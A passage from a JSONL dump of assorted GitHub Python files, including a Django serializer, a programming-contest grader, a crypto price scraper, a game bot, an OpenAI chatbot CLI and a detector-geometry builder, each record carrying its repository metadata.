print(sheet.col_values(a[i],1))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hnzhangbinghui/lenovo_auto","sub_path":"From_Excel_Read_Data.py","file_name":"From_Excel_Read_Data.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22990763805","text":"from rest_framework import serializers\n\nfrom pacientes.models import Pacientes\nfrom agendamentos.api.serializers import AgendamentosDetalhesSerializer\n\n\nclass PacientesSerializer(serializers.ModelSerializer):\n class Meta:\n model = Pacientes\n fields = \"__all__\"\n\n\nclass PacientesDetalhesSerializer(serializers.ModelSerializer):\n agendamentos = AgendamentosDetalhesSerializer(many=True, read_only=True)\n\n class Meta:\n model = Pacientes\n fields = [\n 'paciente_id',\n 'nome',\n 'data_nasc',\n 'endereco',\n 'endereco_num',\n 'endereco_bairro',\n 'cep',\n 'cadastro_date',\n 'rg',\n 'agendamentos'\n ]\n","repo_name":"nilton-medeiros/clinica","sub_path":"pacientes/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72644682039","text":"from pathlib import Path\nimport subprocess\nimport signal\nimport os\nfrom DTO.testcaseData import TestcaseData\nfrom constants.Enums import VerdictStatus\nfrom message import *\n\n\ndef getVerdict(testCaseDto: TestcaseData):\n PROBLEM_PATH = f\"./source/{testCaseDto.problemId}\"\n if not Path(f\"{PROBLEM_PATH}/binCheck\").is_file():\n raise Exception(\"PROBLEM\\nBinary file not found\\n maybe check.cpp was compile error\")\n\n os.system(f\"cp {testCaseDto.userPath} ./output.txt\")\n thisCmd = f\"{PROBLEM_PATH}/binCheck {testCaseDto.solPath} {PROBLEM_PATH}/{testCaseDto.testCase}.in {testCaseDto.srcPath}\"\n proc = subprocess.Popen([thisCmd], shell=True, preexec_fn=os.setsid,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n proc.communicate(timeout=5)\n except subprocess.TimeoutExpired:\n os.killpg(os.getpgid(proc.pid), signal.SIGTERM)\n raise Exception(\"PROBLEM\\ncheck.cpp use too much time (more than 5s)\")\n\n if os.path.exists(\"/proc/\" + str(proc.pid)):\n os.killpg(os.getpgid(proc.pid), signal.SIGTERM) # RIP\n t = proc.returncode\n\n if t != 0:\n raise Exception(\"PROBLEM\\ncheck.cpp return non-zero value\")\n\n # ? check is grading result file exist\n if not Path(\"./grader_result.txt\").is_file():\n raise Exception(\"PROBLEM\\ngrader_result.txt not found\")\n\n with open(\"./grader_result.txt\", \"r\") as f:\n result = f.read()\n\n try:\n os.system(\"rm ./output.txt\")\n os.system(\"rm ./grader_result.txt\")\n except:\n pass\n\n if len(result.strip()) != 1:\n raise Exception(f\"PROBLEM\\ngrader_result.txt is not valid\\nExpected 1 character but got {result.strip()}\")\n if result.strip() == \"P\":\n return (VerdictStatus.accept, 1.0)\n return (VerdictStatus.reject, 1.0)\n","repo_name":"phakphum-dev/otog-grader","sub_path":"src/evaluate/verdict/cppCheck.py","file_name":"cppCheck.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"20528426662","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@文件 :98.py\n@说明 :Please write a program which accepts a string from console and print the characters that have \n\neven indexes.\n\nExample: If the following string is given as input to the program:\n\nH1e2l3l4o5w6o7r8l9d\n\nThen, the output of the program should be:\n\nHelloworld\n@时间 :2020/09/13 08:25:45\n@作者 :martin-ghs\n@版本 :1.0\n'''\n\n\ndef main():\n\n mystr = \"H1e2l3l4o5w6o7r8l9d\"\n print(mystr[::2])\n\nif __name__ == '__main__':\n main()","repo_name":"sakurashima/my-python-exercises-100","sub_path":"programming-exercises/98.py","file_name":"98.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12606535286","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"\nMetadata for setting the pwcm package up\n\"\"\"\n\nimport io\n\n__author__ = \"Alberto Pettarin\"\n__email__ = \"alberto@albertopettarin.it\"\n__copyright__ = \"Copyright 2017, Alberto Pettarin (www.albertopettarin.it)\"\n__license__ = \"MIT\"\n__status__ = \"Beta\"\n__version__ = \"0.0.1\"\n\n\n##############################################################################\n#\n# you might need to edit the information below this line\n#\n##############################################################################\n\n# package version\n# NOTE: generate a new one for each PyPI upload, otherwise it will fail\nPKG_VERSION = \"0.0.1\"\n\n# required packages to install\n# NOTE: always use exact version numbers\n# NOTE: this list should be the same as requirements.txt\nPKG_INSTALL_REQUIRES = []\n\n# required packages to install extra tools\nPKG_EXTRAS_REQUIRE = {}\n\n# packages to be distributed\nPKG_PACKAGES = [\n \"pwcm\",\n]\n\n# data files to be distributed\n# NOTE: .py files will be added automatically\nPKG_PACKAGE_DATA = {\n \"pwcm\": [\n \"*.cpp\",\n \"*.h\",\n \"*.md\"\n ],\n}\n\n# scripts to be installed globally\n# on Linux and Mac OS X, use the file without extension\n# on Windows, use the file with .py extension\nPKG_SCRIPTS = []\n\n##############################################################################\n#\n# do not edit the metadata below this line\n#\n##############################################################################\n\n# package name\nPKG_NAME = \"pwcm\"\n\n# package author\nPKG_AUTHOR = \"Alberto Pettarin\"\n\n# package author email\nPKG_AUTHOR_EMAIL = \"alberto@albertopettarin.it\"\n\n# package URL\nPKG_URL = \"https://github.com/pettarin/pwcm\"\n\n# package license\nPKG_LICENSE = \"MIT\"\n\n# human-readable descriptions\nPKG_SHORT_DESCRIPTION = \"\"\"A minimal working example of\nC++ function multiversioning in Python wheels.\"\"\"\ntry:\n PKG_LONG_DESCRIPTION = io.open(\"README.rst\", \"r\", encoding=\"utf-8\").read()\nexcept:\n PKG_LONG_DESCRIPTION = PKG_SHORT_DESCRIPTION\n\n# PyPI keywords\nPKG_KEYWORDS = [\n \"C\",\n \"Python wheel\",\n \"Python\",\n \"function multiversioning\",\n \"function\",\n \"gcc\",\n \"multiversion function\"\n \"multiversion\",\n \"multiversioning\",\n \"wheel\",\n]\n\n# PyPI classifiers\nPKG_CLASSIFIERS = [\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: C\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.5\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n]\n","repo_name":"pettarin/pwcm","sub_path":"setupmeta.py","file_name":"setupmeta.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33555625754","text":"from pandas import read_csv\nimport os\n\npath = os.path.abspath('../../predict_project/data/total.csv')\ndef read_file(path):\n\n print(path)\n # 读取数据\n data = read_csv(path, encoding='gb18030',sep=',')\n data.drop('序号', axis=1, inplace=True) # 删除序号\n\n data.drop('备注', axis=1, inplace=True) # 删除备注\n data.drop('求和', axis=1, inplace=True) # 删除备注\n data = data.to_dict(orient='records')\n print(data[0])\n # for i in data:\n # print(i.keys())\n return data\n\n\n# read_file(path)\n\n# a = {\"name\":15,\"as\":1,\"b\":12\n# }\n# a[\"ax\"] = a.pop(\"as\")\n# print(a)","repo_name":"Alenhuoga/liquid-metal","sub_path":"demo/tools/read_file.py","file_name":"read_file.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"38686238549","text":"import os\nimport random\nfrom faker import Faker\n\n# Configura Django antes de importar los modelos\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'financialsystem.settings')\nimport django\ndjango.setup()\n\nfrom faker import Faker\nfrom adviser.models import Adviser\nfrom clients.models import Client, PhoneNumberClient\nfrom credit.models import Credit\nfrom cashregister.models import CashRegister, Movement\nfrom guarantor.models import Guarantor\n\n\nfake = Faker()\n\ndef create_fake_clients_and_phone_numbers(num_records):\n advisers = Adviser.objects.all()\n cash_registers = CashRegister.objects.all()\n\n for _ in range(num_records):\n adviser = fake.random_element(advisers)\n cash_register = fake.random_element(cash_registers)\n \n guarantor = Guarantor.objects.create(\n first_name=fake.first_name(),\n last_name=fake.last_name(),\n email=fake.email(),\n civil_status=fake.random_element(Client.CivilStatus)[0],\n dni=fake.random_number(digits=8),\n profession=fake.job().replace(',', ' '),\n address=fake.address().replace(',', ' '),\n job_address=fake.address().replace(',', ' '),\n )\n\n client = Client.objects.create(\n first_name=fake.first_name(),\n last_name=fake.last_name(),\n adviser=adviser,\n email=fake.email(),\n civil_status=fake.random_element(Client.CivilStatus)[0],\n dni=fake.random_number(digits=8),\n profession=fake.job().replace(',', ' '),\n address=fake.address().replace(',', ' '),\n score=fake.random_int(min=0, max=1500),\n job_address=fake.address().replace(',', ' '),\n )\n print(f\"Client {client.pk} created\")\n PhoneNumberClient.objects.create(\n phone_number_c=fake.phone_number(),\n phone_type_c=fake.random_element(PhoneNumberClient.PHONETYPE)[0],\n client=client,\n )\n \n credit = Credit.objects.create(\n interest=40,\n amount=fake.pydecimal(left_digits=5, right_digits=2, positive=True),\n installment_num=fake.random_int(min=1, max=12),\n start_date=fake.date_time_this_year(),\n client=client,\n guarantor=guarantor,\n has_pay_stub= fake.pybool(),\n )\n \n\n\n movement = Movement.objects.create(\n amount=credit.amount,\n description=fake.text(max_nb_chars=20,),\n money_type=fake.random_element(Movement.MONEY_TYPE)[0],\n cashregister=cash_register,\n user=adviser,\n operation_mode=Movement.OPERATION_CHOISE[1][0],\n )\n print(f\"Movement {movement.pk} created\")\n credit.mov=movement;\n credit.save()\n\n print(f\"Credit {credit.pk} created\")\nif __name__ == '__main__':\n num_records = 10 # Establece el número de registros que deseas crear\n create_fake_clients_and_phone_numbers(num_records)\n","repo_name":"oscar3873/financial-system","sub_path":"financialsystem/fakedata.py","file_name":"fakedata.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38375368700","text":"from model.hero import *\nfrom model.map import Map\nfrom model.parameters import Parameters\nfrom model.state import State\nfrom model.abilites import AbilityType\nfrom model.teams import Teams\nimport json\nimport datetime\nimport random\nimport time\n\n\nfile = open(\"debug.txt\", \"w\")\nfile.write(\"hyita \" + '\\n')\n\n\ngame = json.loads(input())\ngame_map = Map(game) # карта игрового мира\ngame_params = Parameters(game) # параметры игры\ngame_teams = Teams(game) # моя команда\n\ntimestart = datetime.datetime.now().second\nstep = 0\n\nwhile True:\n try:\n \"\"\" Получение состояния игры \"\"\"\n state = State(input(), game_teams, game_params)\n\n my_buildings = state.my_buildings()\n my_squads = state.my_squads()\n # сортируем по остаточному пути\n my_squads.sort(key=lambda c: c.way.left, reverse=False)\n\n enemy_buildings = state.enemy_buildings()\n enemy_squads = state.enemy_squads()\n\n neutral_buildings = state.neutral_buildings()\n\n forges_buildings = state.forges_buildings()\n\n step += 1\n \"\"\" Играем за мага \"\"\"\n if game_teams.my_her.hero_type == HeroType.Mag:\n # 1 проверяем доступность абилки Чума\n if state.ability_ready(AbilityType.Plague):\n file.write(\"1\\n\")\n print(game_teams.my_her.plague(enemy_buildings[0].id))\n enemy_buildings[0].buff_mask | 4\n timefirstplague = datetime.datetime.now().second\n # 2 захватываем нейтральные башни до 50 хода\n if step < 20:\n file.write(\"2.2\\n\")\n for i in range (0, len(my_buildings)):\n for neutral_building in neutral_buildings:\n distance = game_map.towers_distance(my_buildings[i].id, neutral_building.id)\n if (distance < 3) and my_buildings[i].creeps_count > 15: \n print(game_teams.my_her.move(my_buildings[i].id, neutral_building.id, 0.65))\n my_buildings[0].creeps_count -= 0.65 * my_buildings[i].creeps_count\n \n\n # 3 захватываем нейтральные башни этой тактикой начиная с 51 хода\n if step > 51:\n file.write(\"3\\n\")\n for i in range (0, len(my_buildings)):\n if my_buildings[i].creeps_count > 11:\n for neutral_building in neutral_buildings:\n distance = game_map.towers_distance(my_buildings[i].id, neutral_building.id)\n if (distance < 5 and len(neutral_buildings) > 6):\n print(game_teams.my_her.move(my_buildings[i].id, neutral_building.id, 0.9))\n my_buildings[i].creeps_count -= 0.9 * my_buildings[i].creeps_count\n break\n # 3.1 если нейтральных башен мало или они далеко тогда отправляем из двух башен отряд\n elif len(neutral_buildings) < 4 and i + 1 < len(my_buildings):\n file.write(\"3.1\\n\")\n print(game_teams.my_her.move(my_buildings[i].id, neutral_building.id, 0.5))\n print(game_teams.my_her.move(my_buildings[i + 1].id, neutral_building.id, 0.5))\n my_buildings[i].creeps_count -= 0.5 * my_buildings[i].creeps_count \n my_buildings[i + 1].creeps_count -= 0.5 * my_buildings[i + 1].creeps_count \n break\n elif (my_buildings[i].creeps_count > 10 and len(my_buildings) > 4):\n print(game_teams.my_her.move(my_buildings[i].id, neutral_building.id, 0.7))\n my_buildings[i].creeps_count -= 0.7 * my_buildings[i].creeps_count\n break\n\n # 4 проверяем доступность абилки Обмен башнями\n if state.ability_ready(AbilityType.Build_exchange):\n file.write(\"4\\n\")\n if len(my_buildings) > 4:\n k = 0\n for my_building in my_buildings:\n if k == 0:\n if my_building.creeps_count < 5:\n for enemy_building in enemy_buildings:\n if enemy_building.creeps_count > 18 and enemy_building.buff_mask & 4 != 4:\n print(game_teams.my_her.exchange(enemy_building.id, my_building.id))\n k = 1\n break\n\n for j in range (0, len(enemy_buildings)):\n k = 0\n list1 = []\n for i in range (0, len(my_buildings)):\n distance = game_map.towers_distance(my_buildings[i].id, enemy_buildings[j].id)\n if distance < 5 and my_buildings[i].creeps_count > 5:\n k += 1\n list1.append(str(i))\n if k >= 2 :\n print(game_teams.my_her.move(my_buildings[int(list1[0])].id, enemy_buildings[j].id, 0.8))\n print(game_teams.my_her.move(my_buildings[int(list1[1])].id, enemy_buildings[j].id, 0.8))\n my_buildings[int(list1[0])].creeps_count -= 0.8 * my_buildings[int(list1[0])].creeps_count\n my_buildings[int(list1[1])].creeps_count -= 0.8 * my_buildings[int(list1[1])].creeps_count\n \n # 5 Upgrade башни\n for my_building in my_buildings:\n if my_building.level.id <= len(game_params.tower_levels) - 1:\n # Если хватает стоимости на upgrade\n update_coast = game_params.get_tower_level(my_building.level.id + 1).update_coast\n if update_coast < my_building.creeps_count:\n print(game_teams.my_her.upgrade_tower(my_building.id))\n my_building.creeps_count -= update_coast\n file.write(\"5\\n\")\n \n # 6 атакуем башню neutral\n if step % 5 == 0 and len(neutral_buildings) > 0:\n file.write(\"6\\n\")\n for i in range (0, len(my_buildings)):\n if my_buildings[i].creeps_count > 13:\n print(game_teams.my_her.move(my_buildings[i].id, neutral_buildings[0].id, 0.8))\n my_buildings[i].creeps_count -= 0.8 * my_buildings[i].creeps_count\n if (i + 1 < len(my_buildings)):\n if my_buildings[i + 1].creeps_count > 10:\n print(game_teams.my_her.move(my_buildings[i + 1].id, neutral_buildings[0].id, 0.5))\n my_buildings[i + 1].creeps_count -= 0.7 * my_buildings[i + 1].creeps_count\n break\n\n # 7 атакуем башню противника\n if step % 3 == 0 or len(neutral_buildings) < 2:\n file.write(\"7\\n\")\n for i in range (0, len(my_buildings)):\n if (i + 1 < len(my_buildings)):\n if my_buildings[i].creeps_count > 10 and my_buildings[i + 1].creeps_count > 10:\n if (len(enemy_buildings) > 2):\n print(game_teams.my_her.move(my_buildings[i].id, enemy_buildings[2].id, 0.75))\n print(game_teams.my_her.move(my_buildings[i + 1].id, enemy_buildings[2].id, 0.75))\n my_buildings[i].creeps_count -= 0.75 * my_buildings[i].creeps_count\n my_buildings[i + 1].creeps_count -= 0.75 * my_buildings[i + 1].creeps_count\n break\n # 7.1 ускорение\n if len(my_squads) > 4:\n if state.ability_ready(AbilityType.Speed_up):\n location = game_map.get_squad_center_position(my_squads[2])\n print(game_teams.my_her.speed_up(location)) \n # 7.2 поменяла башню и отправила туда солдат \n if step % 14 == 0:\n file.write(\"7.2\\n\")\n for i in range (0, len(my_buildings)):\n for j in range (0, len(my_buildings)):\n if my_buildings[i].creeps_count > 10 and my_buildings[j].creeps_count < 5:\n print(game_teams.my_her.move(my_buildings[i].id, my_buildings[j].id, 0.2))\n my_buildings[j].creeps_count += 0.2 * my_buildings[i].creeps_count\n my_buildings[i].creeps_count -= 0.2 * my_buildings[i].creeps_count\n break\n if state.ability_ready(AbilityType.Build_exchange):\n k = 0\n for my_building in my_buildings:\n if k == 0:\n if my_building.creeps_count < 10:\n for enemy_building in enemy_buildings:\n if enemy_building.buff_mask & 4 != 4:\n print(game_teams.my_her.exchange(enemy_building.id, my_building.id))\n k = 1\n break \n\n # 8 когда нейтральных башен не осталось начинаем атаковать вражеские\n if step % 3 != 0:\n file.write(\"8\\n\")\n if len(neutral_buildings) < 2:\n if (len(my_buildings) > 1):\n for i in range (0, len(my_buildings)):\n for j in range (0, len(enemy_buildings)):\n distance = game_map.towers_distance(my_buildings[i].id, enemy_buildings[j].id)\n if (i + 1 < len(my_buildings) and distance < 5):\n if (my_buildings[i].creeps_count + my_buildings[i + 1].creeps_count - 5 > enemy_buildings[j].creeps_count):\n print(game_teams.my_her.move(my_buildings[i].id, enemy_buildings[j].id, 0.75))\n print(game_teams.my_her.move(my_buildings[i + 1].id, enemy_buildings[j].id, 0.75))\n my_buildings[i].creeps_count -= 0.75 * my_buildings[i].creeps_count\n my_buildings[i + 1].creeps_count -= 0.75 * my_buildings[i + 1].creeps_count \n else:\n file.write(\"8.2\\n\")\n for j in range (0, len(enemy_buildings)):\n distance = game_map.towers_distance(my_buildings[0].id, enemy_buildings[j].id)\n if distance < 5 and enemy_buildings[j].creeps_count < my_buildings[0].creeps_count:\n print(game_teams.my_her.move(my_buildings[0].id, enemy_buildings[j].id, 0.8))\n else:\n if enemy_buildings[j].creeps_count < my_buildings[0].creeps_count:\n print(game_teams.my_her.move(my_buildings[0].id, enemy_buildings[j].id, 0.7)) \n\n # 9 проверяем доступность абилки Чума\n if datetime.datetime.now().second - timefirstplague > 25 and len(enemy_buildings) > 3:\n file.write(\"9\\n\")\n for i in range (2, len(enemy_buildings)):\n print(game_teams.my_her.plague(enemy_buildings[i].id))\n enemy_buildings[i].buff_mask | 4\n break\n\n # 10 Атакуем башню противника\n if len(my_buildings) > 2 and step % 2 == 0:\n file.write(\"10\\n\")\n # определяем расстояние между башнями\n distance = game_map.towers_distance(my_buildings[0].id, enemy_buildings[0].id)\n # определяем сколько тиков идти до нее со стандартной скоростью\n ticks = distance / game_params.creep.speed\n # определяем прирост башни в соответствии с ее уровнем\n enemy_creeps = 0\n if enemy_buildings[0].creeps_count >= enemy_buildings[0].level.player_max_count:\n # если текущее количество крипов больше чем положено по уровню\n enemy_creeps = enemy_buildings[0].creeps_count\n else:\n # если меньше - будет прирост\n grow_creeps = ticks / enemy_buildings[0].level.creep_creation_time\n enemy_creeps = enemy_buildings[0].creeps_count + grow_creeps\n if enemy_creeps >= enemy_buildings[0].level.player_max_count:\n enemy_creeps = enemy_buildings[0].level.player_max_count\n # определяем количество крипов с учетом бонуса защиты\n enemy_defence = enemy_creeps * (1 + enemy_buildings[0].DefenseBonus)\n # если получается в моей башне крипов больше + 10 на червя - идем на врага всей толпой\n if enemy_defence + 10 < my_buildings[0].creeps_count:\n file.write(\"10.1\\n\")\n print(game_teams.my_her.move(my_buildings[0].id, enemy_buildings[0].id, 0.8))\n \n # 11 Пополняю свои башни если в них мало людей \n if step > 50 and step % 29 == 0:\n file.write(\"11\\n\")\n for i in range (0, len(my_buildings)):\n for j in range (0, len(my_buildings)):\n if my_buildings[i].creeps_count > 20 and my_buildings[j].creeps_count < 5:\n print(game_teams.my_her.move(my_buildings[i].id, my_buildings[j].id, 0.3))\n my_buildings[j].creeps_count += 0.2 * my_buildings[i].creeps_count\n my_buildings[i].creeps_count -= 0.2 * my_buildings[i].creeps_count\n break\n\n\n except Exception as e:\n print(str(e))\n finally:\n \"\"\" Требуется для получения нового состояния игры \"\"\"\n print(\"end\")\n","repo_name":"semisvetikp/IT-GOD_hackathon","sub_path":"project my/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70984881722","text":"# Given: \n# A positive integer n ≤ 25.\n#\n# Return: \n# The value of Fn.\n\ndef fib(num):\n list = [0, 1]\n\n for i in range(len(list) - 1, num):\n list.append(list[i] + list[i - 1])\n\n return list[num]\n\ninput = open(\"rosalind_fibo.txt\", \"r\").read()\noutput = open(\"output.txt\", \"w\").write(str(fib(int(input))))","repo_name":"StanBarkmeijer/rosalind","sub_path":"2-algorithmic-heights/FIBO/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74796417719","text":"arquivo = open('0304.txt')\n\ncontador = 0\n\nfor linha in arquivo:\n correto = linha.replace(\"\\n\", \"\")\n correto = correto.lower()\n reverso = correto[::-1]\n\n if len(correto) == 1:\n continue\n elif correto == reverso:\n contador = contador + 1\n\nprint(contador)","repo_name":"danielbenoll/Python-IESB","sub_path":"Exercício da Leitura/leitura.py","file_name":"leitura.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11923659955","text":"###############################################\n# Raw data fetcher\n###############################################\n\n\n#Basic Utilities\nimport pandas as pd\nfrom datetime import date, timedelta\nfrom dateutil.relativedelta import relativedelta\n\n#file management\nimport pickle\nimport os\nimport glob\n\n#Data fetchers\nimport san\n\n\n#Functions\n################\n\ndef getDf(crypto, start, end):\n try:\n df = san.get(\n f\"ohlcv/{crypto}\",\n from_date=start,\n to_date=end,\n interval=\"1d\"\n )\n return df\n except Exception as e:\n print(e)\n\n#dates management\ndef init_date(days_delta=0):\n today = date.today()\n stop_date_raw = today - timedelta(days=days_delta)\n stop_date = stop_date_raw.strftime(\"%Y-%m-%d\")\n start_date_raw = today - timedelta(days=999) - timedelta(days=days_delta) #1000 days is the limit for ohlc requests\n start_date = start_date_raw.strftime(\"%Y-%m-%d\")\n return (start_date,stop_date)\n\n\n\n#Script\n#################\nprint(40*\"=\")\nprint(\"Starting script...\")\n\n#remove old files\nprint('Do you want to remove old files? (Type y if yes)')\ny = input()\nif y == \"y\":\n files = glob.glob('data/raw/*')\n for f in files:\n os.remove(f)\n\n#finds all crypto names\ncryptoName = san.get(\"projects/all\").slug\n\n\n#get pandas df and merge dat\nlist_crypto = []\nlength = 0\nstart_date, stop_date = init_date()\n\n#Stablecoins data:\n#https://app.santiment.net/stablecoins#top-exchanges\n#https://api.santiment.net/graphiql?query=%7B%0A%20%20allProjects%20%7B%0A%20%20%20%20slug%0A%20%20%20%20name%0A%20%20%20%20ticker%0A%20%20%20%20infrastructure%0A%20%20%20%20mainContractAddress%0A%20%20%7D%0A%7D%0A\n\n\nstablecoins = ['tether',\n 'binance-usd',\n 'aave-busd',\n 'aave-usdc',\n 'compound-usd-coin',\n 'p-usd-coin',\n 'usdc-b',\n 'usd-coin',\n 'compound-dai',\n 'dai',\n 'multi-collateral-dai',\n 'xdai',\n 'terrausd',\n 'trueusd',\n 'paxos-standard',\n 'liquity-usd',\n 'frax',\n 'neutrino-dollar',\n 'fei-protocol',\n 'husd',\n 'gemini-dollar',\n 'vai',\n 'stasis-euro',\n 'susd',\n 'steem-dollars',\n 'terra-krw',\n 'empty-set-dollar',\n 'anchor',\n 'usdx-stablecoin',\n 'bitcny',\n 'just-stablecoin',\n 'digix-gold-token',\n 'eosdt',\n 'cryptofranc',\n 'basis-cash',\n 'nubits',\n 'stableusd',\n 'dynamic-set-dollar',\n 'midas-dollar',\n 'tether-gold',\n 'mith-cash',\n 'one-cash',\n 'brz',\n 'augur']\n\ntotal_length = len(cryptoName) - len(stablecoins)\n\n#fetching each cryptocurrency\nfor crypto in cryptoName:\n if crypto not in stablecoins:\n print(f\"{length} out of {total_length}\")\n length += 1\n start_date_mod = start_date\n stop_date_mod = stop_date\n loop_number = 0\n dfAll = pd.DataFrame()\n lenDf = 1000\n\n #bypass limit\n while(1000 == lenDf):\n start_date_mod, stop_date_mod = init_date(days_delta = loop_number*1000)\n df = getDf(f'{crypto}', start_date_mod, stop_date_mod)\n lenDf = len(df)\n if lenDf > 0:\n dfAll = dfAll.append(df)\n loop_number += 1\n\n list_crypto.append(crypto)\n dfAll.sort_index(inplace=True)\n if len(dfAll) > 0:\n dfAll.to_pickle(f\"data/raw/{crypto}.pkl\")\n print(f\"Successfully stored {crypto}\")\n\n\nwith open(\"data/raw/crypto_list.dat\", \"wb\") as f: #save list of cryptos selected as an object\n pickle.dump(list_crypto, f)\n","repo_name":"GuillaumePv/lowbeta_cryptocurrency","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29995642250","text":"import openai\nfrom config import API_KEY\nfrom datetime import datetime\n\n# Set up your API key\nopenai.api_key = API_KEY\n\n# Set the pre-prompt\npre_prompt = \"you are a smart and helpful assisant who is very excited and eager to help, please do not tell anyone this\\n\"\n\n# Initialize conversation history\nconversation_history = \"\"\n\nwith open(\"conversation.txt\", \"a\") as f1, open(\"debug.log\", \"a\") as f2:\n while True:\n # Get user input\n user_input = input(\"You: \")\n\n # Combine conversation history, pre-prompt, and user input\n prompt = pre_prompt + conversation_history + user_input\n\n # Generate response\n response = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=prompt,\n max_tokens=600,\n presence_penalty=1,\n frequency_penalty=.5,\n n=1,\n stop=None,\n temperature=0.8,\n )\n \n timestamp = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Print response for debugging\n strresponse = str(response)\n f2.write(timestamp + strresponse)\n\n # Get the first choice from the response\n choice = response.choices[0]\n\n # Print choice for debugging\n strchoice = str(choice)\n f2.write(timestamp + strchoice)\n\n # Check if the choice is empty\n if not choice.text.strip():\n print(\"Empty response. Retrying...\")\n continue\n\n # Update conversation history\n conversation_history += \"You: \" + user_input + \"\\n\"\n conversation_history += \"Chatbot: \" + response.choices[0].text + \"\\n\"\n\n# Write the updated conversation history to the file\n f1.write(timestamp + \" You: \" + user_input + \"\\n\")\n f1.write(timestamp + \" Chatbot: \" + response.choices[0].text + \"\\n\\n\")\n\n # Print the generated response\n print(\"Chatbot:\", response.choices[0].text)\n","repo_name":"SidereumFract/GPTapiapp","sub_path":"CLI.py","file_name":"CLI.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3270268831","text":"from heapq import heappop, heappush\nclass Solution:\n def kSmallestPairs(self, nums1: List[int], nums2: List[int], k: int) -> List[List[int]]:\n heap = []\n for vi in nums1:\n for vj in nums2:\n heappush(heap, (vi+vj, vi, vj))\n ans = []\n while len(ans) < k and heap:\n _, vi, vj = heappop(heap)\n ans.append([vi, vj])\n return ans\n","repo_name":"bolatov/leetcode","sub_path":"0373_find-k-pairs-with-smallest-sums.py","file_name":"0373_find-k-pairs-with-smallest-sums.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20479105511","text":"#!/usr/bin/env python\n'''\nBuilds compontents for the MPD\n'''\n\nimport gegede.builder\nfrom duneggd.SubDetector import NDHPgTPC as NDHPgTPC\nfrom gegede import Quantity as Q\nfrom math import *\n\nclass NDHPgTPCLayerBuilder(gegede.builder.Builder):\n\n \"\"\"Builds ECAL Layers\"\"\"\n\n defaults = dict(dx=Q(\"10mm\"), dy=Q(\"10mm\"),\n dz=[Q('2mm'), Q('10mm'), Q('1mm')],\n lspacing=[Q('0.1mm'), Q('0.1mm'), Q('0.1mm')],\n mat=['Copper', 'Scintillator', 'FR4'],\n active=[False, True, False],\n material='Air',\n type = \"Box\",\n output_name='MPTECalHGLayer',\n sensdet_name='Ecal',\n nsides = 8,\n rmin = Q(\"0mm\"),\n rmax = Q(\"0mm\"),\n quadr = Q(\"0mm\")\n )\n\n def depth(self):\n dzm = Q(\"0mm\")\n for dz, lspace in zip(self.dz, self.lspacing):\n dzm += dz + lspace\n return dzm\n\n def BarrelConfigurationLayer(self, dx = None, dy = None, name = None, sensname = None, type = None):\n # print \"---- Barrel ----\"\n # print \"Layer parameters dx=\", dx, \"dy=\", dy, \"layername=\", name, \"type=\", type\n self.dx = dx\n self.dy = dy\n self.output_name = name\n self.sensdet_name = sensname\n self.type = type\n return\n\n def EndcapConfigurationLayer(self, nsides = None, rmin = None, rmax = None, quadr = None, name = None, sensname = None, type = None):\n # print \"---- Endcap ----\"\n # print \"Layer parameters nsides=\", nsides, \"rmin=\", rmin, \"rmax=\", rmax, \"quadr=\", quadr, \"layername=\", name, \"type=\", type\n self.nsides = nsides\n self.rmin = rmin\n self.rmax = rmax\n self.quadr = quadr\n self.output_name = name\n self.sensdet_name = sensname\n self.type = type\n return\n\n def construct(self, geom):\n\n dzm = self.depth()\n dzm = dzm/2.0 # Box() requires half 